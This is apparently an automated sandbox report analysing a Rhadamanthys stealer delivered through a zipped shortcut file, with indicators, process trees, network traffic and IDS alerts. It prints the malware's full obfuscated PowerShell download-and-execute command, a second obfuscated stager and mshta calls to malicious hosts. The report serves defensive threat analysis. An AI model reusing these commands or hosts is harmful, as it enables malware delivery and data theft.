Malware analysis 3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee Malicious activity

Add for printing

File name:	3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee
Full analysis:	https://app.any.run/tasks/bddbf4f2-7a0c-407a-b568-277a8a3c5cef
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Rhadamanthys is a C++ information-stealing malware that extracts sensitive data from infiltrated machines. Its layered operational chain and advanced evasion tactics make it a major risk in cybersecurity landscapes. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	September 06, 2024, 23:28:50
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	exploit cve-2017-0199 github loader rhadamanthys stealer
Indicators:
MIME:	application/zip
File info:	Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:	299FF5995CD11BF00A433447EC6FC9EA
SHA1:	06762CF9EA908DB9E888D4270014EC28722E877B
SHA256:	3106463200B3CFEA89B7F8EF164EA9EE208EC3A48A42407C5AA73BFF7BAB25EE
SSDEEP:	1536:JwJPR/OZr76tZDzjcpV+Vwaq6MTi/nkf0oWlSRSarbsRVsv2nUT:0J/krWtZDvoVopwTi/n+6SPrCVM2nQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Changes powershell execution policy (Unrestricted)
  - WinRAR.exe (PID: 3316)
  - mshta.exe (PID: 644)
- EXPLOIT has been detected (SURICATA)
  - mshta.exe (PID: 644)
- Downloads the requested resource (POWERSHELL)
  - powershell.exe (PID: 3184)
- Starts Visual C# compiler
  - XT10.exe (PID: 5704)
- RHADAMANTHYS has been detected (SURICATA)
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- Changes the autorun value in the registry
  - XT10.exe (PID: 5704)
- Actions looks like stealing of personal data
  - OOBE-Maintenance.exe (PID: 2572)
- Stealers network behavior
  - OOBE-Maintenance.exe (PID: 2572)
SUSPICIOUS
- Probably obfuscated PowerShell command line is found
  - WinRAR.exe (PID: 3316)
- Reads security settings of Internet Explorer
  - WinRAR.exe (PID: 3316)
- Starts POWERSHELL.EXE for commands execution
  - WinRAR.exe (PID: 3316)
  - mshta.exe (PID: 644)
- Probably download files using WebClient
  - mshta.exe (PID: 644)
- Powershell scripting: start process
  - mshta.exe (PID: 644)
- Gets or sets the security protocol (POWERSHELL)
  - powershell.exe (PID: 3184)
- Block-list domains
  - mshta.exe (PID: 644)
  - powershell.exe (PID: 3184)
- Process requests binary or script from the Internet
  - powershell.exe (PID: 3184)
- Runs shell command (SCRIPT)
  - mshta.exe (PID: 644)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 3184)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3184)
- Potential Corporate Privacy Violation
  - powershell.exe (PID: 3184)
- The process checks if it is being run in the virtual environment
  - OpenWith.exe (PID: 1432)
- Contacting a server suspected of hosting an CnC
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- Connects to unusual port
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- Loads DLL from Mozilla Firefox
  - OOBE-Maintenance.exe (PID: 2572)
- Searches for installed software
  - OOBE-Maintenance.exe (PID: 2572)
INFO
- The process uses the downloaded file
  - WinRAR.exe (PID: 3316)
  - mshta.exe (PID: 644)
  - powershell.exe (PID: 3184)
  - WINWORD.EXE (PID: 6592)
- Reads security settings of Internet Explorer
  - powershell.exe (PID: 4688)
- Reads Internet Explorer settings
  - mshta.exe (PID: 644)
- Reads the software policy settings
  - powershell.exe (PID: 4688)
- Create files in a temporary directory
  - powershell.exe (PID: 4688)
- Checks proxy server information
  - mshta.exe (PID: 644)
  - powershell.exe (PID: 3184)
- Disables trace logs
  - powershell.exe (PID: 3184)
- Sends debugging messages
  - WINWORD.EXE (PID: 6592)
- The executable file from the user directory is run by the Powershell process
  - XT10.exe (PID: 5704)
- Checks supported languages
  - XT10.exe (PID: 5704)
  - csc.exe (PID: 360)
  - setup_wm.exe (PID: 6412)
- Reads the computer name
  - csc.exe (PID: 360)
  - setup_wm.exe (PID: 6412)
- Manual execution by a user
  - OpenWith.exe (PID: 1432)
  - OOBE-Maintenance.exe (PID: 2572)
- Reads the machine GUID from the registry
  - setup_wm.exe (PID: 6412)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.zip	\|	ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion:	20
ZipBitFlag:	-
ZipCompression:	Deflated
ZipModifyDate:	2024:09:05 15:35:24
ZipCRC:	0x4c823ccd
ZipCompressedSize:	871
ZipUncompressedSize:	2780
ZipFileName:	Anytime Fitness.pdf.lnk

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

147

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

360

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

—

XT10.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Visual C# Command Line Compiler

Exit code:

Version:

4.8.9037.0 built by: NET481REL1

Modules

Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll

644

"C:\WINDOWS\system32\mshta.exe" http://gg.gg/1bzm37

C:\Windows\System32\mshta.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft (R) HTML Application host

Exit code:

Version:

11.00.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll

1432

"C:\WINDOWS\system32\openwith.exe"

C:\Windows\SysWOW64\OpenWith.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Pick an app

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll

2256

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

2572

"C:\WINDOWS\system32\OOBE-Maintenance.exe"

C:\Windows\System32\OOBE-Maintenance.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

OOBE-Maintenance

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\oobe-maintenance.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\shcore.dll

3184

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function UVhyeI($mAhhd, $mNaZaE){[IO.File]::WriteAllBytes($mAhhd, $mNaZaE)};function qzhjG($mAhhd){if($mAhhd.EndsWith((QnajIUKq @(46055,46109,46117,46117))) -eq $True){Start-Process (QnajIUKq @(46123,46126,46119,46109,46117,46117,46060,46059,46055,46110,46129,46110)) $mAhhd}else{Start-Process $mAhhd}};function RxRdDZpG($hWKZQlYFV){$eUcfgkDy = New-Object (QnajIUKq @(46087,46110,46125,46055,46096,46110,46107,46076,46117,46114,46110,46119,46125));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$mNaZaE = $eUcfgkDy.DownloadData($hWKZQlYFV);return $mNaZaE};function QnajIUKq($kKmXB){$bvIBCmt=46009;$JgXiRx=$Null;foreach($dTERC in $kKmXB){$JgXiRx+=[char]($dTERC-$bvIBCmt)};return $JgXiRx};function WNDRQYXK(){$IOFHo = $env:APPDATA + '\';$IuFrsiq = RxRdDZpG (QnajIUKq @(46113,46125,46125,46121,46124,46067,46056,46056,46112,46114,46125,46113,46126,46107,46055,46108,46120,46118,46056,46124,46123,46125,46106,46120,46107,46106,46119,46113,46057,46065,46065,46056,46054,46129,46110,46118,46109,46110,46121,46125,46123,46106,46114,46056,46123,46106,46128,46056,46118,46106,46114,46119,46056,46075,46110,46106,46108,46113,46046,46059,46057,46076,46114,46125,46130,46046,46059,46057,46075,46106,46124,46110,46107,46106,46117,46117,46046,46059,46057,46074,46108,46106,46109,46110,46118,46130,46055,46109,46120,46108,46129));$DqHRIIOZ = $IOFHo + 'Beach%20City%20Baseball%20Academy.docx';UVhyeI $DqHRIIOZ $IuFrsiq;qzhjG $DqHRIIOZ;;$csZcFtK = RxRdDZpG (QnajIUKq @(46113,46125,46125,46121,46067,46056,46056,46126,46116,46119,46120,46128,46119,46106,46107,46120,46109,46110,46055,46109,46126,46108,46116,46109,46119,46124,46055,46120,46123,46112,46056,46113,46123,46120,46128,46056,46097,46093,46058,46057,46055,46110,46129,46110));$gcvAJC = $IOFHo + 'XT10.exe';UVhyeI $gcvAJC $csZcFtK;qzhjG $gcvAJC;;;}WNDRQYXK;

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

mshta.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll

3316

"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee.zip

C:\Program Files\WinRAR\WinRAR.exe

—

explorer.exe

User:

admin

Company:

Alexander Roshal

Integrity Level:

MEDIUM

Description:

WinRAR archiver

Version:

5.91.0

Modules

Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

3812

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

OOBE-Maintenance.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4688

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $L=':b/3aT7mhMl1st.pgz'; &(-join($L[(306-294),(461-457),(-474+484)])) \= (-join($L[(306-294),(461-457),(-474+484)])); \= $\ (-join($L[(-893+900),(306-294),(316-308),(-207+212),(461-457)])); foreach($r in @((714-706),(334-321),(-371+384),(747-732),(194-194),(-549+551),(191-189),(-107+123),(477-461),(-397+411),(-227+243),(-160+176),(-391+393),(628-617),(219-218),(301-284),(686-679),(-262+265),(-894+900))){$m+=$L[$r]}; $\ $m;

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

WinRAR.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

5704

"C:\Users\admin\AppData\Roaming\XT10.exe"

C:\Users\admin\AppData\Roaming\XT10.exe

powershell.exe

User:

admin

Company:

BioWare Corp.

Integrity Level:

MEDIUM

Description:

Star Wars: Knights of the Old Republic

Exit code:

Version:

1, 0, 3, 0

Modules

Images
c:\users\admin\appdata\roaming\xt10.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll

Add for printing

Total events

30 499

Read events

30 077

Write events

396

Delete events

Modification events


(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\AppData\Local\Temp\3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee.zip
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(3316) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	write	Name:	SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:	(644) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(644) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(644) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:

Add for printing

Executable files

Suspicious files

124

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3184	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x4rkzcdk.bny.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6592	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres		binary
		MD5:FE1D9B7573E1D36490800EBE3BA7B1AD	SHA256:33B52C1C3D1ADABDE3F7B9AE117DB8B63DBC9E6B12C35C57138B6119F8F50EE1
4688	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tm1024ss.t1j.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
644	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\example[1].hta		html
		MD5:61421F90DC4FFBAAC5D5849E396EAFF6	SHA256:187A8168C645DE1A9EB24FE9746168A843F981BAC033FCA19DC6FEF6EEC6F271
4688	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:971F94D760A267703E1A1C11877AE7C8	SHA256:FCE9E231FC18A7FFBD4871AC613A90271823BA37852CE033E58127C8F76C8870
6592	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres		binary
		MD5:E4FE0C0F6528C64F514834D9D9E3EA09	SHA256:3871355F7D768D1B0E52660E3E1C4C2879D64F018ACF8B15A26BE70F6473BC27
3184	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qkt31pey.m4j.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4688	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3K8DBWSQSGWZW6OJX1V.temp		binary
		MD5:7650CB99CFDC2479385A34C5C1C87A0B	SHA256:F840C4EE836BFA7A18982576A3E0B4D79E853D4F8AF83FD94B56A67F8E4C75EE
6592	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat		text
		MD5:1202159BE7898C9F12353B7A9CEDEA7F	SHA256:A1B9C4050253FB7ECA9749237D4FBBF42A5956D6E472C566259ED43F0C5DD779
6592	WINWORD.EXE	C:\Users\admin\AppData\Roaming\~$ach City Baseball Academy.docx		binary
		MD5:C3DBA282EB0AA9A0B56C1C3027509420	SHA256:35D7D3CDBE22A8D5E0280603B1CB3A89BABF35B4A8AEA2E7B6FED23854932915

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4132	svchost.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
644	mshta.exe	GET	301	91.215.42.31:80	http://gg.gg/1bzm37	unknown	—	—	shared
644	mshta.exe	GET	200	94.154.172.166:80	http://uknownabode.duckdns.org/hrow/example.hta	unknown	—	—	malicious
6212	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl	unknown	—	—	whitelisted
6212	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	23.48.23.156:80	http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl	unknown	—	—	whitelisted
6592	WINWORD.EXE	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
6288	RUXIMICS.exe	4.231.128.59:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
2120	MoUsoCoreWorker.exe	4.231.128.59:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4132	svchost.exe	4.231.128.59:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
644	mshta.exe	91.215.42.31:80	gg.gg	Ddos-guard Ltd	RU	shared
644	mshta.exe	94.154.172.166:80	uknownabode.duckdns.org	Enes Koken	US	malicious
4132	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4132	svchost.exe	95.101.149.131:80	www.microsoft.com	Akamai International B.V.	NL	whitelisted
3184	powershell.exe	140.82.121.3:443	github.com	GITHUB	US	shared

DNS requests

Domain	IP	Reputation
google.com	216.58.206.46	whitelisted
gg.gg	91.215.42.31	shared
uknownabode.duckdns.org	94.154.172.166	malicious
settings-win.data.microsoft.com	51.104.136.2 40.127.240.158 20.73.194.208	whitelisted
www.microsoft.com	95.101.149.131 184.30.21.171	whitelisted
github.com	140.82.121.3	shared
raw.githubusercontent.com	185.199.110.133 185.199.111.133 185.199.108.133 185.199.109.133	shared
officeclient.microsoft.com	52.109.32.97	whitelisted
ecs.office.com	52.113.194.132	whitelisted
omex.cdn.office.net	2.19.126.160 2.19.126.151	whitelisted

Threats

PID	Process	Class	Message
2256	svchost.exe	Potentially Bad Traffic	ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
2256	svchost.exe	Misc activity	ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2256	svchost.exe	Misc activity	ET INFO GG Url Shortener Observed in DNS Query
644	mshta.exe	Potentially Bad Traffic	ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain
644	mshta.exe	Potentially Bad Traffic	ET POLICY Possible HTA Application Download
644	mshta.exe	Attempted User Privilege Gain	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
644	mshta.exe	A Network Trojan was detected	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)
2256	svchost.exe	Not Suspicious Traffic	INFO [ANY.RUN] Attempting to access raw user content on GitHub
3184	powershell.exe	Potentially Bad Traffic	ET INFO DYNAMIC_DNS HTTP Request to a *.duckdns .org Domain
3184	powershell.exe	Misc activity	ET INFO Packed Executable Download

6 ETPRO signatures available at the full report

Add for printing

Process	Message
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE	WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.

General Info

3106463200b3cfea89b7f8ef164ea9ee208ec3a48a42407c5aa73bff7bab25ee

299FF5995CD11BF00A433447EC6FC9EA

06762CF9EA908DB9E888D4270014EC28722E877B

3106463200B3CFEA89B7F8EF164EA9EE208EC3A48A42407C5AA73BFF7BAB25EE

1536:JwJPR/OZr76tZDzjcpV+Vwaq6MTi/nkf0oWlSRSarbsRVsv2nUT:0J/krWtZDvoVopwTi/n+6SPrCVM2nQ

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Unrestricted)

EXPLOIT has been detected (SURICATA)

Downloads the requested resource (POWERSHELL)

Starts Visual C# compiler

RHADAMANTHYS has been detected (SURICATA)

Changes the autorun value in the registry

Actions looks like stealing of personal data

Stealers network behavior

SUSPICIOUS

